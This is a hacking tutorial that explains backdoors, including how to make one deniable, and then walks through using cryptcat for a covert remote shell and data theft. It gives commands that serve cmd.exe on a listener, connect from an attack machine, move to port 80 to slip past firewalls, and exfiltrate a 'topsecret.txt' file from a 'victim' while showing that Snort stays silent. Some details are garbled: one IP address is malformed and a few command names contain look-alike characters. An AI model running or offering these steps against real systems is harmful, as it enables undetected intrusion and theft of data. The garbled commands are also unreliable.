Attention! All information is provided for informational and educational purposes only. The author is not responsible for any possible harm caused by the materials of this article.
In this article, we will talk about backdoor so straight to the point.
Backdoor, backdoor (back door — “back door”, literally “back door”) is an algorithm defect that is intentionally built into it by the developer and allows unauthorized access to data or remote control of the operating system and the computer as a whole …
The main goal of the backdoor is to secretly and quickly gain access to data, in most cases — to encrypt and protect data. For example, a backdoor can be built into an encryption algorithm for the subsequent wiretapping of a secure channel by an attacker.
The perfect backdoor
impossible to detect;
can be used repeatedly;
It is easy to deny — it looks like a mistake, and if found, the developer can refer to the fact that he made this mistake by accident and had no malicious intent;
we exploit only with knowledge of the secret — only those who know how the backdoor is activated can use it;
protected from compromise by previous uses — even if the backdoor was discovered, it is impossible to establish who previously exploited it and what information the attacker possessed;
it is difficult to repeat — even if the backdoor was found by someone, it will not be possible to use it in another code or in another device.
Building Backdoor with Cryptcat!
Cryptcat allows us to communicate between two systems and encrypts the communication between them using twofish, one of many excellent encryption algorithms.
In this tutorial, we’ll introduce you to netcat’s popular cousin, cryptcat (which is actually much prettier and more exotic than plain netcat).
Since Twofish encryption is on par with AES encryption, this makes cryptcat practically bulletproof. Thus, IDS cannot detect harmful behavior even when it routes through such normal HTTP ports 80 and 443.
Step 1: Download Cryptcat
You can download and install cryptcat on the Windows system from this link .
Step 2: Open a listener on a Windows system
We can open a listener on any system with the same syntax as for netcat. In our case, we open a listener on Windows 7 on port 6996 and create a command shell.
cryptcat -l -p 6996 -e cmd.exе
Cryptcat-1
-l means “open listener”
-p 6996 means “place listener on port 6996”
-e cmd.exe means “start a command shell for communication”
Step 3: Open Snort or Other IDS
Now, let’s run an IDS like Snort on another system that will connect to the Windows system to see if encryption can blind the IDS, leaving our back door invisible to such security devices.
Cryptcat-2
Step 4: Connect to Windows system with Cryptcat
Cryptcat is installed on BackTrack by default, so we don’t have to download and install it. In addition, it is located in the / bin directory, so we can access it from any directory.
Now let’s connect to the Windows 7 cryptcat system from our BackTrack system and see if we can make an encrypted backdoor connection that is almost undetectable.
cryptcat 192.168.4.182.248 6996
Cryptcat-3
As you can see, we are connected to a Windows 7 system and got a command shell from Win 7 system! This gives us significant control over this system, but not total control, because the command shell has limited capabilities.
Step 5: Check Snort Logs and Alerts
This type of attack (shell passing through the network) is easily detected by Snort or other IDS when the connection is not encrypted. The Snort rules will warn the sysadmin that the cmd.ex shell is going through the network connection, and they will probably do something to deter you from using that shell. With an encrypted connection available from cryptcat, this connection is nearly impossible to detect.
Let’s go back and check the logs and alerts in Snort. If we were successful in evading IDS, then we shouldn’t see a warning about shell movement across the network. We can check our logs by going to / var / snort / alerts and seeing if there are any signals caused by our communication with the Windows machine (usually we should find an alert).
kwritе / var / snort / alerts
Cryptcat-4
As you can see, we have been successful. We were able to connect to the Windows system without attracting the attention of any of the security systems!
Step 6: Send Crypcat over port 80 to evade the firewall
Although we have successfully created an encrypted backdoor on the victim’s system, a close security administrator will notice that an unusual port (6996) is open. This will most likely initiate some kind of security admin action to restrict our access. Also, on systems with a good sysadmin and a good firewall, this port is likely to be blocked by the firewall.
For any network to be able to communicate on the Internet, it will most likely need to keep ports 80 and 443 open, but also possibly 25, 53, and 110. Since unencrypted, normal Internet traffic goes through port 80, which is almost always open, then a slight increase in traffic is hardly noticed.
Now that we have successfully used cryptcat, we will send it over port 80 with all other internet traffic. Although encrypted, it will look like any binary data transmitted over the line. Therefore, it will be nearly impossible for security devices to detect to block it, as they must always allow traffic on port 80, and the traffic is encrypted and the IDS will not be able to “see” its contents.
Here we will move a file from the victim’s system called topsecret.txt to our attacking system without being detected by any security device. This time, instead of sending a shell over the network, we will send a top secret file called topsecret.txt over our encrypted connection. We can do this by typing at the Windows command line:
cryptcat -l -p 80 <topsecret.txt
Cryptcat-5
-l means “open listener”
-p 80 means “open listener on port 80”
<means “send a file through this listener”
Step 7: Connect to the listener
Now let’s connect to the victim’s system and pull out the top secret file. All you need to do is connect to the listener by typing cryptcat, the victim’s system IP address, and the listener’s port number.
cryptcat 192.168.182.248 80
Cryptcat-6
As you can see, the file went through our link successfully!
Step 8: Check the alert file
Let’s check our Snort log files again to prove that our IDS did not detect this top-secret file traffic.
kwrite / var / snort / alerts
Cryptcat-7
As you can see, our top-secret file moved through port 80 under the noses of sysadmins, IDS and firewall without a trace!
Cryptcat is a great little tool for moving data outside the victim’s system through normally open ports without being detected by any security devices.
